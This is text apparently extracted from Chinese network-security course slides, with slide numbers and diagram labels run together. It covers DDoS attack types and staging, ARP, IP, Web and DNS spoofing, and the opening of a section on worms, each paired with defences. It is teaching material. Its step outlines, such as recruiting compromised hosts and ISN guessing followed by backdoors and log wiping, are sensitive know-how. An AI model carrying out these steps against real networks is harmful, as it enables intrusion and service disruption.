代理程序（Zombie），或者稱為攻擊點（daemon）86五、拒絕服務攻擊DDOS攻擊分類帶寬耗盡型是堵塞目標網(wǎng)絡的出口，導致帶寬消耗不能提供正常的上網(wǎng)服務。例如常見的Smurf攻擊、UDPFlood攻擊、MStreamFlood攻擊等。針對此類攻擊一般采取的措施就是QoS，在路由器或防火墻上針對此類數(shù)據(jù)流限制流量，從而保證正常帶寬的使用。單純帶寬耗盡型攻擊較易被識別，并被丟棄。資源耗盡型攻擊者利用服務器處理缺陷，消耗目標服務器的關鍵資源，例如CPU、內存等，導致無法提供正常服務。例如常見的SynFlood攻擊、NAPTHA攻擊等。資源耗盡型攻擊利用系統(tǒng)對正常網(wǎng)絡協(xié)議處理的缺陷，使系統(tǒng)難于分辨正常流和攻擊流，導致防范難度較大，是目前業(yè)界最關注的焦點問題，例如方正SynGate產品就是專門防范此類的產品。87五、拒絕服務攻擊被DDoS攻擊時的現(xiàn)象：

*被攻擊主機上有大量等待的TCP連接

*網(wǎng)絡中充斥著大量的無用的數(shù)據(jù)包，源地址為假

*制造高流量無用數(shù)據(jù)，造成網(wǎng)絡擁塞，使受害主機無法正常和外界通訊

*利用受害主機提供的服務或傳輸協(xié)議上的缺陷，反復高速的發(fā)出特定的服務請求，使受害主機無法及時處理所有正常請求

*嚴重時會造成系統(tǒng)死機

88五、拒絕服務攻擊分布式拒絕服務攻擊網(wǎng)絡結構圖客戶端客戶端主控端主控端主控端主控端代理端代理端代理端代理端代理端代理端代理端代理端89五、拒絕服務攻擊分布式拒絕服務攻擊步驟不安全的計算機掃描程序Hacker攻擊者使用掃描工具探測掃描大量主機以尋找潛在入侵目標。1Internet90五、拒絕服務攻擊Hacker被控制的計算機(代理端)黑客設法入侵有安全漏洞的主機并獲取控制權。這些主機將被用于放置后門、sniffer或守護程序甚至是客戶程序。2Internet91五、拒絕服務攻擊Hacker

黑客在得到入侵計算機清單后，從中選出滿足建立網(wǎng)絡所需要的主機，放置已編譯好的守護程序，并對被控制的計算機發(fā)送命令。3被控制計算機（代理端）MasterServerInternet92五、拒絕服務攻擊Hacker

UsingClientprogram,

黑客發(fā)送控制命令給主機，準備啟動對目標系統(tǒng)的攻擊4被控制計算機（代理端）TargetedSystemMasterServerInternet93五、拒絕服務攻擊InternetHacker

主機發(fā)送攻擊信號給被控制計算機開始對目標系統(tǒng)發(fā)起攻擊。5MasterServerTargetedSystem被控制計算機（代理端）94五、拒絕服務攻擊TargetedSystemHacker目標系統(tǒng)被無數(shù)的偽造的請求所淹沒，從而無法對合法用戶進行響應，DDOS攻擊成功。6MasterServerUserRequestDeniedInternet被控制計算機（代理端）95五、拒絕服務攻擊MasterMasterMasterFloodingFloodingFloodingFloodingFloodingFlooding攻擊目標攻擊者MasterMasterMaster96五、拒絕服務攻擊預防DDOS攻擊的措施確保主機不被入侵且是安全的；周期性審核系統(tǒng)；檢查文件完整性；優(yōu)化路由和網(wǎng)絡結構；優(yōu)化對外開放訪問的主機；在網(wǎng)絡上建立一個過濾器（filter）或偵測器（sniffer），在攻擊信息到達網(wǎng)站服務器之前阻擋攻擊信息。97五、拒絕服務攻擊對付DDOS的攻擊的方法定期掃描現(xiàn)有的網(wǎng)絡主節(jié)點，清查可能存在的安全漏洞。對新出現(xiàn)的漏洞及時進行清理。骨干節(jié)點的計算機因為具有較高的帶寬，是黑客利用最佳位置，因此對這些主機本身加強主機安全是非常重要的。在骨干節(jié)點上的防火墻的配置至關重要。防火墻本身能抵御DDOS攻擊和其它一些攻擊。在發(fā)現(xiàn)受到攻擊的時候，可以將攻擊導向一些犧牲主機，這樣保護真正的主機不被癱瘓。用足夠的機器承受黑客攻擊。這是一種較為理想的應對策略。如果用戶擁有足夠的容量和足夠的資源給黑客攻擊，在它不斷訪問用戶、奪取用戶資源之時，自己的能量也在逐漸耗失，或許未等用戶被攻死，黑客已無力支招兒。

使用Inexpress、ExpressForwarding過濾不必要的服務和端口，即在路由器上過濾假IP。比如Cisco公司的CEF（CiscoExpressForwarding）可以針對封包SourceIP和RoutingTable做比較，并加以過濾。98五、拒絕服務攻擊充分利用網(wǎng)絡設備保護網(wǎng)絡資源。所謂網(wǎng)絡設備是指路由器、防火墻等負載均衡設備，它們可將網(wǎng)絡有效地保護起來。當網(wǎng)絡被攻擊時最先死掉的是路由器，但其他機器沒有死。死掉的路由器經(jīng)重啟后會恢復正常，而且啟動起來還很快，沒有什么損失。若其他服務器死掉，其中的數(shù)據(jù)會丟失，而且重啟服務器又是一個漫長的過程。使用UnicastReversePathForwarding檢查訪問者的來源。它通過反向路由表查詢的方法檢查訪問者的IP地址是否是真，如果是假的，它將予以屏蔽。許多黑客攻擊常采用假IP地址方式迷惑用戶，很難查出它來自何處，因此，利用UnicastReversePathForwarding可減少假IP地址的出現(xiàn)，有助于提高網(wǎng)絡安全性。限制SYN/ICMP流量。用戶應在路由器上配置SYN/ICMP的最大流量來限制SYN/ICMP封包所能占有的最高頻寬，這樣，當出現(xiàn)大量的超過所限定的SYN/ICMP流量時，說明不是正常的網(wǎng)絡訪問，而是有黑客入侵。99五、拒絕服務攻擊怎樣對付正在進行的DDOS攻擊？如果用戶正在遭受攻擊，他所能做的抵御工作非常有限。因為在原本沒有準備好的情況下有大流量的災難性攻擊沖向用戶，很可能用戶在還沒回過神之際，網(wǎng)絡已經(jīng)癱瘓。但是，用戶還是可以抓住機會尋求一線希望的。首先，檢查攻擊來源，通常黑客會通過很多假的IP地址發(fā)起攻擊，此時，用戶若能夠分辨出哪些是真IP地址，哪些是假IP地址，然后了解這些IP來自哪些網(wǎng)段，再找網(wǎng)段管理員把機器關掉，即可消除攻擊。其次，找出攻擊者所經(jīng)過的路由，把攻擊屏蔽掉。若黑客從某些端口發(fā)動攻擊，用戶可把這些端口屏蔽掉，以狙擊入侵。最后一種比較折衷的方法是在路由器上濾掉ICMP。100六、欺騙攻擊什么是欺騙攻擊ARP欺騙攻擊IP欺騙攻擊Web欺騙攻擊DNS欺騙攻擊101六、欺騙攻擊1.什么是欺騙攻擊純技術性利用了TCP/IP協(xié)議的缺陷不涉及系統(tǒng)漏洞較為罕見1994.12.25，凱文.米特尼克利用IP欺騙技術攻破了SanDiego計算中心1999年，RSASecurity公司網(wǎng)站遭受DNS欺騙攻擊1998年，臺灣某電子商務網(wǎng)站遭受Web欺騙攻擊，造成大量客戶的信用卡密碼泄漏欺騙攻擊的主要類型：ARP欺騙IP欺騙攻擊Web欺騙攻擊DNS欺騙攻擊102六、欺騙攻擊2.ARP欺騙攻擊ABHacker當A與B需要通訊時：A發(fā)送ARPRequest詢問B的MAC地址B發(fā)送ARPReply告訴A自己的MAC地址103六、欺騙攻擊Meet-in-Middle:Hacker發(fā)送偽裝的ARPReply告訴A，計算機B的MAC地址是Hacker計算機的MAC地址。Hacker發(fā)送偽裝的ARPReply告訴B，計算機A的MAC地址是Hacker計算機的MAC地址。這樣A與B之間的通訊都將先經(jīng)過Hacker，然后由Hacker進行轉發(fā)。于是Hacker可以捕獲到所有A與B之間的數(shù)據(jù)傳輸（如用戶名和密碼）。這是一種典型的中間人攻擊方法。104六、欺騙攻擊Hi,我就是A啊Hi,我就是B啊ABHacker105六、欺騙攻擊針對ARP欺騙攻擊的預防措施安裝入侵檢測系統(tǒng)，檢測ARP欺騙攻擊MAC地址與IP地址綁定

arp–sIPMAC下載并安裝Anti

ARP

Sniffer

等專殺工具在主機上安裝諾頓等正版網(wǎng)絡殺毒軟件，并經(jīng)常更新病毒庫及時給系統(tǒng)、ＩＥ、交換設備打補丁內網(wǎng)用戶設置強健的密碼，不要隨便共享文件，即使要共享文件也要設置好權限和密碼，不要隨便的點擊ＱＱ、ＭＳＮ中發(fā)來鏈接，不要使用游戲的外掛程序，不要隨便點擊、下載郵件的附件安裝使用網(wǎng)絡防火墻關閉不必要的服務和共享106六、欺騙攻擊3.IP欺騙.IP欺騙技術就是偽造某臺主機的IP地址的技術。通過IP地址的偽裝使得某臺主機能夠偽裝另外的一臺主機，而這臺主機往往具有某種特權或者被另外的主機所信任。IP欺騙原理：理論依據(jù)(TCP/IP建立連接之前的三次握手)第一步：B----------SYN1---------A第二步：B-------SYN2+ACK1-------A第三步：B----------ACK2---------ASYN（數(shù)據(jù)序列）

ACK（確認標識）

ISN（連接初始值）

ACK1=SYN1+1SYN2=ISN2ACK2=SYN2+1107六、欺騙攻擊IP欺騙過程ABZ互相信任DoS攻擊探測ISN規(guī)律SYN(我是B，可以連接嗎？)SYN|ACKACK(我是B，確認連接)108六、欺騙攻擊攻擊描述：屏蔽主機B。方法：Dos攻擊，如Land攻擊、SYN洪水攻擊序列號采樣和猜測。猜測ISN的基值和增加規(guī)律將源地址偽裝成被信任主機，發(fā)送SYN數(shù)據(jù)請求建立連接等待目標主機發(fā)送SYN+ACK，黑客看不到該數(shù)據(jù)包再次偽裝成被信任主機發(fā)送ACK，并帶有預測的目標機的ISN+1建立連接，通過其它已知漏洞獲得Root權限，安裝后門并清除Log109六、欺騙攻擊針對IP欺騙攻擊的預防措施安裝VPN網(wǎng)關，實現(xiàn)加密和身份認證；實施PKICA,實現(xiàn)身份認證；通信加密：是在通信時要求加密傳輸和通信和驗證；拋棄基于地址的信任策略：是放棄以地址為基礎的驗證。不允許R*類遠程調用命令的使用；刪除rhosts文件；清空/etc/hostsequiv文件。110六、欺騙攻擊4.Web欺騙攻擊何謂Web欺騙？創(chuàng)造一個Web站點的映像，使得用戶的連接被接入到Hacker的服務器，達到欺騙網(wǎng)絡用戶的目的。為什么會受到Web欺騙？監(jiān)控網(wǎng)絡用戶；竊取帳戶信息；損壞網(wǎng)站形象；失效SSL連接。111六、欺騙攻擊Web欺騙的預防：瀏覽器狀態(tài)顯示連接為；鼠標連接目標提示；攻擊者可以憑借JavaScript或VBScript修改以上信息；但可以通過禁止執(zhí)行Script功能來揭露其面目；Sourcecode可以完全泄漏攻擊者的信息112六、欺騙攻擊5.DNS欺騙攻擊當一個DNS服務器掉入陷阱，使用了來自一個惡意DNS服務器的錯誤信息，那么該DNS服務器就被欺騙了。DNS攻擊途徑：緩存感染：將數(shù)據(jù)放入一個沒有設防的DNS服務器的緩存當中。這些緩存信息會在客戶進行DNS訪問時返回給客戶，從而將客戶引導到入侵者所設置的運行木馬的Web服務器或郵件服務器上，然后黑客從這些服務器上獲取用戶信息。

113六、欺騙攻擊DNS信息劫持入侵者通過監(jiān)聽客戶端和DNS服務器的對話，通過猜測服務器響應給客戶端的DNS查詢ID。每個DNS報文包括一個相關聯(lián)的16位ID號，DNS服務器根據(jù)這個ID號獲取請求源位置。黑客在DNS服務器之前將虛假的響應交給用戶，從而欺騙客戶端去訪問惡意的網(wǎng)站DNS重定向攻擊者能夠將DNS名稱查詢重定向到惡意DNS服務器。這樣攻擊者可以獲得DNS服務器的寫權限114六、欺騙攻擊防范DNS欺騙攻擊的措施直接用IP訪問重要的服務，這樣至少可以避開DNS欺騙攻擊。但這需要你記住要訪問的IP地址。加密所有對外的數(shù)據(jù)流，對服務器來說就是盡量使用SSH之類的有加密支持的協(xié)議，對一般用戶應該用PGP之類的軟件加密所有發(fā)到網(wǎng)絡上的數(shù)據(jù)。115七、蠕蟲病毒（Worm）概述蠕蟲病毒（Worm）是計算機病毒的一種，通過網(wǎng)絡傳播，目前主要的傳播途徑有電子郵件、系統(tǒng)漏洞、聊天軟件等。蠕蟲病毒是病毒與黑客手段的結合，如紅色代碼、尼姆達病毒等。蠕蟲病毒是傳播最快的病毒種類之一，傳播速度最快的蠕蟲可以在幾分鐘之內傳遍全球。蠕蟲病毒要影響網(wǎng)絡的帶寬，不僅入侵了受害主機，甚至引起網(wǎng)絡中斷。116七、蠕蟲病毒蠕蟲病毒的傳播途徑系統(tǒng)漏洞：此病毒傳播速度極快，如“震蕩波”病毒，三天之內就感染了全球至少50萬臺計算機。預防：打好相應的系統(tǒng)補丁，可以應用瑞星殺毒軟件的“漏洞掃描”工具聊天軟件：“性感烤雞”病毒就通過MSN